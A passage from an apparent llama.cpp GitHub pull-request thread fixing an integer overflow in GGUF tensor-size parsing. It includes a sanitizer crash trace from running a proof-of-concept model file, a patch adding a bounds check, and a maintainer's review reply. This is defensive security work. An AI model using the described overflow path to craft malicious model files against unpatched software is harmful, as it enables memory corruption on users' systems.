#5  0x00007fd5cb352435 in llama_model_quantize_impl(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, llama_model_quantize_params const*) () from /root/llama.cpp.pascal/build/bin/libllama.so.0
#6  0x00007fd5cb35c312 in llama_model_quantize () from /root/llama.cpp.pascal/build/bin/libllama.so.0
#7  0x0000564b4671f763 in main ()
[Inferior 1 (process 959806) detached]
./test_exploit.sh : ligne 6 : 959806 Abandon                 ASAN_OPTIONS=abort_on_error=1:detect_leaks=0 ./build/bin/llama-quantize ~/A/overflow_poc_friday.gguf /tmp/out.gguf Q4_0
[*] Exit code: 134

With my 2 day ago patch :

(root|~/llama.cpp.pascal) git diff
diff --git a/ggml/src/gguf.cpp b/ggml/src/gguf.cpp
index b165d8bdc..00e31a8e2 100644
--- a/ggml/src/gguf.cpp
+++ b/ggml/src/gguf.cpp
@@ -585,6 +585,15 @@ struct gguf_context * gguf_init_from_file_impl(FILE * file, struct gguf_init_par
                 break;
             }

+            // check that total size in bytes fits in size_t
+            const int64_t ne_total = info.t.ne[0] * info.t.ne[1] * info.t.ne[2] * info.t.ne[3];
+            if (blck_size > 0 && (uint64_t)ne_total / blck_size > SIZE_MAX / type_size) {
+                GGML_LOG_ERROR("%s: tensor '%s' size overflow\n",
+                    __func__, info.t.name);
+                ok = false;
+                break;
+            }
+
             // calculate byte offsets given the tensor shape and type
             info.t.nb[0] = type_size;
             info.t.nb[1] = info.t.nb[0]*(info.t.ne[0]/blck_size);

Do you want me to test the PR patch? It seems unnecessarily larger.

(root|~/A) ./test_exploit.sh
[*] Testing with ASAN build...
main: build = 7749 (a75fd08e7)
main: built with GNU 12.2.0 for Linux x86_64
main: quantizing '/root/A/overflow_poc_friday.gguf' to '/tmp/out.gguf' as Q4_0
gguf_init_from_file_impl: tensor 'token_embd.weight' size overflow
gguf_init_from_file_impl: failed to read tensor info
llama_model_quantize: failed to quantize: llama_model_loader: failed to load model from /root/A/overflow_poc_friday.gguf
main: failed to quantize model from '/root/A/overflow_poc_friday.gguf'
[*] Exit code: 1

@JohannesGaessler
Copy link
Copy Markdown
Contributor

ggml_nbytes_safe should not be in the core library, I've already laid out how the fix should be done and this has not changed. And just in case you're unaware, let me remind you of this rule from the contributing guidelines:

  1. Using AI to respond to human reviewers is strictly prohibited.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

ggml changes relating to the ggml tensor library for machine learning

Projects

None yet

Development

Successfully merging this pull request may close these issues.

4 participants